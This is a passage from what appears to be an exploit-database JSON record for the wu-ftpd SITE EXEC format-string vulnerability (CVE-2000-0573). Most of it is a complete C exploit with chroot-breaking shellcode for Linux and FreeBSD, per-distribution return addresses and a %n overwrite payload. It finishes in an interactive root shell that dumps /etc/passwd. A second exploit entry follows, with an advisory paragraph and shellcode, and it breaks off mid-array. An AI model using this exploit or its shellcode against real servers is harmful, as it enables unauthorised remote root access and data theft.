((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)\r\n#define GREEN \"\\033[32m\"\r\n#define RED \"\\033[31m\"\r\n#define NORM \"\\033[0m\"\r\n\r\nchar infin_loop[]= /* for testing purposes */\r\n \"\\xEB\\xFE\";\r\n\r\nchar bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */\r\n \"\\x31\\xc0\\x50\\x50\\x50\\xb0\\x7e\\xcd\\x80\\x31\\xdb\\x31\\xc0\\x43\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\xb0\\x5a\\xcd\\x80\\xeb\\x77\\x5e\\x31\\xc0\"\r\n \"\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\x68\\xff\\xff\\x01\\x53\\x53\\xb0\"\r\n \"\\x88\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\x53\\x53\\xb0\\x3d\\xcd\\x80\"\r\n \"\\x31\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\"\r\n \"\\x31\\xc0\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\"\r\n \"\\xf1\\x31\\xc0\\x88\\x46\\x09\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x3d\\xcd\"\r\n \"\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\"\r\n \"\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\"\r\n \"\\x0c\\x52\\x51\\x53\\x53\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x53\"\r\n \"\\x53\\xb0\\x01\\xcd\\x80\\xe8\\x84\\xff\\xff\\xff\\xff\\xff\\xff\\x30\"\r\n \"\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\"\r\n \"\\x67\\x6c\\x69\\x6e\";\r\n\r\nchar bsd_code_d[]= /* you should call it directly (no jump/call)*/\r\n \"\\xEB\\xFE\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5C\"\r\n \"\\x8B\\x74\\x24\\xFC\\x31\\xC9\\xB1\\x15\\x01\\xCE\\xB1\\x71\\xB0\\xEF\"\r\n \"\\x30\\x06\\x8D\\x76\\x01\\xE2\\xF9\\xDE\\x26\\xDE\\x2F\\xBE\\x5F\\xF8\"\r\n \"\\xBF\\x22\\x6F\\x5F\\xB5\\xEB\\xB4\\xBE\\xBF\\x22\\x6F\\x62\\xB9\\x14\"\r\n \"\\x87\\x75\\xED\\xEF\\xEF\\xBD\\x5F\\x67\\xBF\\x22\\x6F\\x62\\xB9\\x11\"\r\n \"\\xBE\\xBD\\x5F\\xEA\\xBF\\x22\\x6F\\x66\\x2C\\x62\\xB9\\x14\\xBD\\x5F\"\r\n \"\\xD2\\xBF\\x22\\x6F\\xBC\\x5F\\xE2\\xBF\\x22\\x6F\\x5C\\x11\\x62\\xB9\"\r\n \"\\x12\\x5F\\xE3\\xBD\\xBF\\x22\\x6F\\x11\\x24\\x9A\\x1C\\x62\\xB9\\x11\"\r\n \"\\xBD\\x5F\\xD2\\xBF\\x22\\x6F\\x62\\x99\\x12\\x66\\xA1\\xEB\\x62\\xB9\"\r\n \"\\x17\\x66\\xF9\\xB9\\xB9\\xBD\\x5F\\xD4\\xBF\\x22\\x6F\\xC0\\x8D\\x86\"\r\n \"\\x81\\xC0\\x9C\\x87\\xEF\\xC1\\xC1\\xEF\";\r\n\r\nchar linuxcode[]= /* Lam3rZ chroot() code */\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n \"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n \"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\xff\\x01\\xb0\\x27\"\r\n \"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\"\r\n \"\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\"\r\n \"\\x5e\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\"\r\n \"\\x09\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\"\r\n \"\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\"\r\n \"\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\";\r\n\r\n#define MAX_FAILED 4\r\n#define MAX_MAGIC 100\r\nstatic int magic[MAX_MAGIC],magic_d[MAX_MAGIC];\r\nstatic char *magic_str=NULL;\r\nint before_len=0;\r\nchar *target=NULL,*username=\"ftp\",*password=NULL;\r\nstruct targets getit;\r\n\r\nstruct targets {\r\n int def;\r\n char *os_descr, *shellcode;\r\n int delay;\r\n u_long pass_addr, addr_ret_addr;\r\n int magic[MAX_MAGIC], magic_d[MAX_MAGIC],islinux;\r\n};\r\n\r\nstruct targets targ[]={\r\n {1,\"RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"SuSe 6.3 with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"SuSe 6.4 with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},1},\r\n {0,\"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)\",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports\",bsdcode,10,0x80bb474-100, 0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1\r\n,2,1,2,1,4},0},\r\n {0,\"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages\",bsdcode,2,0x806d5b0-500,0xbfbfc6bc, {0x84,1,2,1,2}, {1,3,2,1,4},\r\n0},\r\n {0,\"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports\",bsdcode,2,0x80a4dec-400,0xbfbfc624,{0x3B,2,1,0xe,0x40,1,2,1,2},{1,\r\n2,1,2,1,3,2,1,4},0},\r\n {0,\"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages\",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},0},\r\n {0,NULL,NULL,0,0,0,{0},{0},0}\r\n};\r\n\r\nvoid usage(char*zu,int q){\r\nint i, n, padding;\r\nfprintf(stderr,\"Usage: %s -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]\\n\"\r\n\" [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]\\n\"\r\n\"target : host with any wuftpd\\nuser : anonymous user\\n\"\r\n\"dir : if not anonymous user, you need to have writable directory\\n\"\r\n\"magic_str : magic string (see exploit description)\\n-g : enables magic string digging\\n\"\r\n\"-x : enables test mode\\npass_addr : pointer to setproctitle argument\\n\"\r\n\"ret_addr : this is pointer to shellcode\\nsystypes: \\n\",zu);\r\n for(i=0;targ[i].os_descr!=NULL;i++){\r\n padding=0;\r\n fprintf(stderr,\"%s%2d - %s\\n\",targ[i].def?\"*\":\" \",i,targ[i].os_descr);\r\n if(q>1){\r\n fprintf(stderr,\" Magic ID: [\");\r\n for(n=0;targ[i].magic[n]!=0;n++){\r\n if(targ[i].magic_d[n]==4)\r\n padding=targ[i].magic[n];\r\n fprintf(stderr,\"%02X,%02X\",targ[i].magic[n],targ[i].magic_d[n]);\r\n if(targ[i].magic[n+1]!=0)\r\n fprintf(stderr,\":\");\r\n }\r\n fprintf(stderr,\"] Padding: %d\\n\",padding);\r\n fflush(stderr);\r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\nint connect_to_server(char*host){\r\n struct hostent *hp;\r\n struct sockaddr_in cl;\r\n int sock; \r\n \r\n if(host==NULL||*host==(char)0){\r\n fprintf(stderr,\"Invalid hostname\\n\");\r\n exit(1);\r\n }\r\n if((cl.sin_addr.s_addr=inet_addr(host))==-1) {\r\n if((hp=gethostbyname(host))==NULL) {\r\n fprintf(stderr,\"Cannot resolve %s\\n\",host);\r\n exit(1);\r\n }\r\n memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr));\r\n }\r\n if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){\r\n fprintf(stderr,\"Error creating socket: %s\\n\",strerror(errno));\r\n exit(1);\r\n }\r\n cl.sin_family=PF_INET;\r\n cl.sin_port=htons(21);\r\n if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1){\r\n fprintf(stderr,\"Cannot connect to %s: %s\\n\",host,strerror(errno));\r\n exit(1);\r\n }\r\n return sock;\r\n}\r\n\r\nint ftp_recv(int sock,char*buf,int buf_size,int disc){\r\n int n=0;\r\n char q;\r\n \r\n if(disc) while((n=recv(sock,&q,1,0))==1&&q!='\\n');\r\n else {\r\n (void)bzero(buf,buf_size);\r\n n=recv(sock,buf,buf_size,0);\r\n if(n<0){\r\n fprintf(stderr,\"ftp_recv: recv failed\\n\");\r\n exit(1);\r\n }\r\n buf[n]=0;\r\n }\r\n return n;\r\n}\r\nint ftp_send(int sock,char*what,int size,int f,char*ans,int ans_size){\r\n int n;\r\n n=send(sock,what,size,0);\r\n if(n!=size){\r\n fprintf(stderr,\"ftp_send: failed to send. expected %d, sent %d\\n\", size,n);\r\n shutdown(sock,2);\r\n close(sock);\r\n exit(1);\r\n }\r\n if(f)\r\n return ftp_recv(sock,ans,ans_size,0);\r\n return 0;\r\n}\r\n\r\nint ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_len){\r\n ftp_send(sock,buff,buff_len,q,ans,ans_len);\r\n if(strncmp(ans,\"200-\",4)==0)\r\n ftp_recv(sock,NULL,0,1);\r\n else\r\n ftp_recv(sock,ans,ans_len,0);\r\n \r\n if(strncmp(ans,\"200-\",4)){\r\n fprintf(stderr,\"Cannot find site exec response string\\n\");\r\n exit(1);\r\n }\r\n return 0;\r\n}\r\n\r\nvoid ftp_login(int sock,char*u_name,char*u_pass)\r\n{\r\n char buff[2048];\r\n printf(\"loggin into system..\\n\");\r\n snprintf(buff,2047,\"USER %s\\r\\n\", u_name);\r\n ftp_send(sock, buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"USER %s\\n\"NORM\"%s\",u_name,buff);\r\n snprintf(buff,2047,\"PASS %s\\r\\n\",u_pass);\r\n printf(GREEN\"PASS %s\\n\"NORM,*u_pass=='\\x90'?\"<shellcode>\":u_pass);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n while(strstr(buff,\"230 \")==NULL){\r\n (void)bzero(buff,2048);\r\n ftp_recv(sock,buff,2048,0);\r\n }\r\n printf(\"%s\",buff);\r\n return;\r\n}\r\n\r\nvoid ftp_mkchdir(int sock,char*cd,char*new)\r\n{\r\n char buff[2048];\r\n\r\n sprintf(buff,\"CWD %s\\r\\n\",cd);\r\n printf(GREEN\"%s\"NORM,buff);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(\"%s\",buff);\r\n sprintf(buff,\"MKD %s\\r\\n\",new);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"MKD <shellcode>\"NORM\"\\n%s\",buff);\r\n sprintf(buff,\"CWD %s\\r\\n\",new);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"CWD <shellcode>\"NORM\"\\n%s\",buff);\r\n return;\r\n}\r\nvoid process_possibly_rooted(int sock)\r\n{\r\n fd_set fd_read;\r\n char buff[1024], *cmd=\"/bin/cat /etc/passwd;/usr/bin/id;\\n\";\r\n int n;\r\n\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n send(sock, cmd, strlen(cmd), 0);\r\n while(1) {\r\n FD_SET(sock,&fd_read);\r\n FD_SET(0,&fd_read);\r\n if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n if( FD_ISSET(sock, &fd_read) ) {\r\n if((n=recv(sock,buff,sizeof(buff),0))<0){\r\n fprintf(stderr, \"EOF\\n\");\r\n exit(2);\r\n }\r\n if(write(1,buff,n)<0)break;\r\n }\r\n if ( FD_ISSET(0, &fd_read) ) {\r\n if((n=read(0,buff,sizeof(buff)))<0){ \r\n fprintf(stderr,\"EOF\\n\");\r\n exit(2);\r\n }\r\n if(send(sock,buff,n,0)<0) break;\r\n }\r\n usleep(10); \r\n }\r\n fprintf(stderr,\"Connection aborted, select failed()\\n\");\r\n exit(0);\r\n}\r\n\r\nint magic_check_f(int sock, char *str) {\r\n char q[2048], ans[2048];\r\n\r\n snprintf(q, 2048, \"site exec %s%s\\r\\n\", str, \"%.f\");\r\n if( strstr( q, \"\\r\\n\") == NULL) {\r\n fprintf(stderr,\"Line TOO big..\\n\");\r\n exit(-1);\r\n }\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2048);\r\n if( before_len+10 < strlen(&ans[3]) ) return 0;\r\n before_len=strlen(&ans[3]);\r\n (void)strcat(str,\"%.f\");\r\n return 1;\r\n}\r\nint magic_check_o(int sock, char *str) {\r\n char q[2048], ans[2048];\r\n snprintf(q, 2048, \"site exec %s%s\\r\\n\", str, \"%c\");\r\n if( strstr( q, \"\\r\\n\") == NULL) {\r\n fprintf(stderr,\"Line TOO big..\\n\");\r\n exit(-1);\r\n }\r\n ftp_siteexec( sock, q, strlen(q), 1, ans, 2048);\r\n if( before_len== strlen(&ans[3]) ) {\r\n before_len+=1;\r\n (void)strcat(str, \"%d\");\r\n return 3;\r\n }\r\n before_len=strlen(&ans[3]);\r\n (void)strcat(str,\"%c\");\r\n return 2;\r\n}\r\n\r\nint magic_check_ok( int sock, char *str)\r\n{\r\n char q[2048], ans[2048];\r\n int i ,n=1, f, padding=0;\r\n \r\n snprintf(q, 2048,\"site exec aaaaaaaa%s%s\\r\\n\", str, \"%p%p\");\r\n if ( strstr(q, \"\\r\\n\" ) == NULL) {\r\n fprintf(stderr, \"Line too long\\n\");\r\n exit(-1);\r\n }\r\n (void)bzero(ans, 2048);\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);\r\n if(strstr(ans,\"0x61616161\")==NULL)\r\n return 0;\r\n for(i =0; i < MAX_MAGIC && magic[i]; i++);\r\n magic_d[i]=4;\r\n while(n){\r\n for(f=0; f< 2; f++) {\r\n snprintf(q, 2048,\"site exec %.*saaaa%s%s\\r\\n\", padding, \"xxxx\", str, f?\"%p%p\":\"%p\");\r\n (void)bzero(ans, 2048);\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);\r\n if( strstr(ans, \"0x61616161\")!=NULL) {\r\n if (f==0) {\r\n magic[i]=padding;\r\n return 1;\r\n } else if( f==1) {\r\n strcat(str,\"%p\");\r\n magic[i]=padding;\r\n return 1;\r\n }\r\n }\r\n }\r\n if(padding > 4) {\r\n fprintf(stderr,\"Cannot calculate padding..\\n\");\r\n exit(1);\r\n }\r\n padding++; \r\n }\r\n return 1;\r\n}\r\n\r\n\r\nint magic_digger(int sock)\r\n{\r\n int get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=0;\r\n \r\n if(magic_str==NULL){\r\n if((magic_str=(char*)malloc(4092))==NULL){\r\n perror(\"malloc\");\r\n exit(errno);\r\n }\r\n }\r\n (void)bzero(magic_str, 4092);\r\n where=0;\r\n while(get_out) {\r\n int q;\r\n if( where >= MAX_MAGIC-1 || all_failed <= 0 )\r\n return -1;\r\n if( magic_check_f(sock, magic_str) ) {\r\n o=0,f++;\r\n if(f==1){\r\n if(!magic[where])\r\n magic[where]=1;\r\n else\r\n magic[++where]+=1;\r\n magic_d[where]=1;\r\n } else\r\n magic[where]+=1;\r\n all_failed=MAX_FAILED*2;\r\n printf(\"%s\", \"%.f\"); fflush(stdout);\r\n goto verify;\r\n }\r\n all_failed--;\r\n if((q=magic_check_o(sock,magic_str))){\r\n f=0,o++;\r\n if(o==1){\r\n if(!magic[where])\r\n magic[0]=1;\r\n else\r\n magic[++where]+=1;\r\n magic_d[where]=q;\r\n } else {\r\n if(magic_d[where]==q)\r\n magic[where]+=1;\r\n else {\r\n magic[++where]=1;\r\n magic_d[where]=q;\r\n }\r\n }\r\n all_failed=MAX_FAILED*2;\r\n printf(\"%s\", q==2?\"%c\":\"%d\");\r\n fflush(stdout);\r\n goto verify;\r\n }\r\n all_failed--;\r\n continue;\r\n verify:\r\n if(magic_check_ok(sock,magic_str)){\r\n putchar('\\n');\r\n return 0;\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[]){\r\n char *buff, *buff_p, *buff_p2, c, shellcode[500],*dir,*passwd=shellcode;\r\n int i, sock, num=-2, padding=-1, gm=0, testmode=0,mtype=0,bla=0,offset=0;\r\n u_long ret_addr=0, pass_addr=0;\r\n for(i=0;targ[i].os_descr!=NULL;i++);\r\n while((c=getopt(argc,argv,\"t:l:m:o:s:r:p:M:P:xghH?\"))!=EOF){\r\n switch(c) {\r\n case 't': target=optarg;break;\r\n case 'l':\r\n username=optarg;\r\n passwd=strchr(optarg,'/');\r\n if(passwd==NULL)\r\n usage(argv[0],0);\r\n *passwd++=(char)0;\r\n break;\r\n case 'x': testmode=1; break;\r\n case 'o': offset=atoi(optarg);break;\r\n case 'p': pass_addr=strtoul(optarg, &optarg,16); break;\r\n case 'g': gm=1; break;\r\n case 'M': dir=optarg;mtype=1;break;\r\n case 'm':\r\n {\r\n int where=0;\r\n if(!*optarg) {\r\n fprintf(stderr,\"-m requires argument, try -h for help\\n\");\r\n exit(1);\r\n }\r\n while(1) {\r\n magic[where]=strtoul(optarg,&optarg,16);\r\n optarg=strchr(optarg,',');\r\n if(optarg==NULL){\r\n printf(\"comma missing\\n\");\r\n exit(1);\r\n }\r\n optarg++;\r\n magic_d[where++]=strtoul(optarg,&optarg,16);\r\n if(strchr(optarg,':')==NULL){\r\n magic[where]=magic_d[where]=0;\r\n break;\r\n }\r\n optarg=strchr(optarg,':');\r\n optarg++;\r\n }\r\n }\r\n break;\r\n case 's':\r\n num=atoi(optarg);\r\n if(num>i) {\r\n fprintf(stderr,\"systype too big, try -h for help\\n\");\r\n exit(1);\r\n } \r\n break;\r\n case 'r':\r\n ret_addr=strtoul(optarg,&optarg,16);\r\n break;\r\n case 'P':\r\n padding=atoi(optarg);\r\n break;\r\n case 'H':\r\n bla=2;\r\n default: usage(argv[0],bla);break;\r\n }\r\n }\r\n if(target==NULL){\r\n fprintf(stderr,\"No target specified, try -h for help\\n\");\r\n exit(1);\r\n }\r\n if(num==-1||num==-2) {\r\n for(i=0;!targ[i].def;i++);\r\n num=i;\r\n }\r\n (void)memcpy((void*)&getit,(void*)&targ[num],sizeof(struct targets));\r\n\r\n if(magic[1]!=0) {\r\n memcpy((void*)getit.magic,magic,sizeof(magic));\r\n memcpy((void*)getit.magic_d,magic_d,sizeof(magic));\r\n }\r\n\r\n if(ret_addr)getit.addr_ret_addr=ret_addr;\r\n if(pass_addr)getit.pass_addr=pass_addr;\r\n\r\n getit.addr_ret_addr+=(offset*4);\r\n\r\n sock=connect_to_server(target);\r\n memset(shellcode, '\\x90', sizeof(shellcode));\r\n shellcode[sizeof(shellcode)-1]=(char)0;\r\n if(!mtype){\r\n memcpy((void*)&shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void*)getit.shellcode, strlen(getit.shellcode)+1);\r\n shellcode[sizeof(shellcode)-1]=(char)0;\r\n }else{\r\n memcpy((void*)&shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellcode,strlen(getit.shellcode));\r\n shellcode[250-1]=(char)0;\r\n }\r\n printf(\"Target: %s (%s/%s): %s\\n\",target,username,*passwd=='\\x90'?\"<shellcode>\":passwd,getit.os_descr);\r\n printf(\"Return Address: 0x%08lx, AddrRetAddr: 0x%08lx, Shellcode: %d\\n\\n\",getit.pass_addr,getit.addr_ret_addr,strlen(getit.\r\nshellcode));\r\n\r\n buff=(char *)malloc(1024);\r\n bzero(buff,1024);\r\n\r\n (void)ftp_recv(sock,NULL,0,1);\r\n\r\n (void)ftp_login(sock,username,passwd);\r\n\r\n if(gm||(magic_str==NULL&&getit.magic[0]==0)){\r\n printf(\"STEP 2A: Generating magic string: \");\r\n fflush(stdout);\r\n magic_digger(sock);\r\n memcpy((void *)getit.magic,(void*)magic,sizeof(magic));\r\n memcpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_d));\r\n printf(\"STEP 2B: MAGIC STRING: [\");\r\n } else {\r\n printf(\"STEP 2 : Skipping, magic number already exists: [\");\r\n }\r\n for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){\r\n printf(\"%02X,%02X\",getit.magic[i],getit.magic_d[i]);\r\n if(getit.magic[i+1]!=0)\r\n putchar(':');\r\n }\r\n printf(\"]\\n\");\r\n buff=(char *)realloc(buff, 4092);\r\n (void)bzero(buff, 4092);\r\n if(mtype)\r\n ftp_mkchdir(sock,dir,shellcode);\r\n printf(\"STEP 3 : Checking if we can reach our return address by format string\\n\");\r\n if(!magic_str){\r\n magic_str=(char*)malloc(2048);\r\n if(magic_str==NULL) {\r\n perror(\"malloc\");\r\n exit(errno);\r\n }\r\n (void)bzero(magic_str,2048);\r\n for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){\r\n switch(getit.magic_d[i]) {\r\n case 1:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%.f\");\r\n break;\r\n case 2:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%c\");\r\n break;\r\n case 3:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%d\");\r\n break;\r\n case 4:if(padding<0)padding=getit.magic[i];break;\r\n default:fprintf(stderr,\"STEP 3: INternal error\\n\");\r\n exit(1);\r\n break;\r\n }\r\n }\r\n }\r\n if(padding<0){\r\n for(num=0;num<MAX_MAGIC&&getit.magic_d[num]!=4;num++);\r\n if(num<(MAX_MAGIC-1))\r\n padding=getit.magic[num];\r\n else\r\n fprintf(stderr,\"WARNING: PROBLEMS WITH PADDING\\n\");\r\n }\r\n \r\n if(!getit.islinux){\r\n if(!testmode)\r\n snprintf(buff,4096,\"site exec %.*s%c%c%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.addr_ret_addr\r\n),magic_str,\"%p\");\r\n else\r\n snprintf(buff,4096,\"site exec %.*s%c%c%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.pass_addr),ma\r\ngic_str,\"%p\");\r\n } else {\r\n if(!testmode)\r\n snprintf(buff,4096,\"site exec %.*s%c%c\\xff%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.addr_ret_\r\naddr),magic_str,\"%p\");\r\n else\r\n snprintf(buff,4096,\"site exec %.*s%c%c\\xff%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.pass_addr\r\n),magic_str,\"%p\");\r\n }\r\n sleep(getit.delay);\r\n fflush(stdout);\r\n if((buff_p=(char *)malloc(4096))==NULL){\r\n fprintf(stderr,\"malloc failed.\\n\");\r\n exit(1);\r\n }\r\n (void)bzero(buff_p,4096);\r\n ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095);\r\n if((buff_p2=strchr(buff_p,'\\r'))!=NULL)\r\n *buff_p2=(char)0;\r\n if((buff_p2=strchr(buff_p,'\\n'))!=NULL)\r\n *buff_p2=(char)0;\r\n buff_p2=strstr(buff_p,\"|0x\");\r\n if(buff_p2==NULL){\r\n fprintf(stderr,\"Fix me, incorrect response from '%%p':%s\\n\",buff_p);\r\n exit(1);\r\n }\r\n buff_p2+=3;\r\n if(!testmode)\r\n printf(\"STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\\n\",buff_p2,getit.addr_ret_addr);\r\n else\r\n printf(\"STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\\n\",buff_p2,getit.pass_addr);\r\n sleep(getit.delay);\r\n buff_p2=strstr(buff, \"%.f\");\r\n *buff_p2++=(char )0;\r\n strcpy(buff_p, buff);\r\n if(!testmode)\r\n sprintf(buff_p+strlen(buff_p),\"%s%u%c\",\"%d%.\",(u_int)getit.pass_addr,'d');\r\n else\r\n sprintf(buff_p+strlen(buff_p),\"%s\",\"%d%d\");\r\n strcpy(buff_p+strlen(buff_p), buff_p2);\r\n buff_p2=strchr(buff_p,'|');\r\n buff_p2++;\r\n printf(\"STEP 5 : Sending code.. this will take about 10 seconds.\\n\");\r\n if(!testmode){\r\n strcpy(buff_p2,\"%n\\r\\n\");\r\n ftp_send(sock,buff_p,strlen(buff_p),0,NULL,0);\r\n } else {\r\n (void)bzero(buff,4096);\r\n strcpy(buff_p2,\"%s\\r\\n\");\r\n ftp_send(sock,buff_p,strlen(buff_p),1,buff,4092);\r\n printf(\"got answer: %s\\n\",buff);\r\n exit(0);\r\n }\r\n free(buff_p);\r\n free(buff);\r\n signal(SIGINT, SIG_IGN);\r\n signal(SIGHUP, SIG_IGN);\r\n printf(RED\"Press ^\\\\ to leave shell\"NORM\"\\n\");\r\n process_possibly_rooted(sock);\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20030/"}, {"lastseen": "2016-02-02T13:19:20", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (2). CVE-2000-0573. Remote exploit for linux platform", "published": "2000-09-26T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2000-09-26T00:00:00", "id": "EDB-ID:20031", "href": "https://www.exploit-db.com/exploits/20031/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n \r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n \r\nIt should be noted that the SITE INDEX command is affected as well. \r\n\r\n * Linux wu-ftpd - 2.6.0(1) (tested on RH6.2 wu from rpm)\r\n *\r\n * vsz_\r\n */\r\n\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdio.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\nchar linuxcode[] =\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n \"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n \"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\xff\\x01\\xb0\\x27\"\r\n \"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\"\r\n \"\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\"\r\n \"\\x5e\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\"\r\n \"\\x09\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\"\r\n \"\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\"\r\n 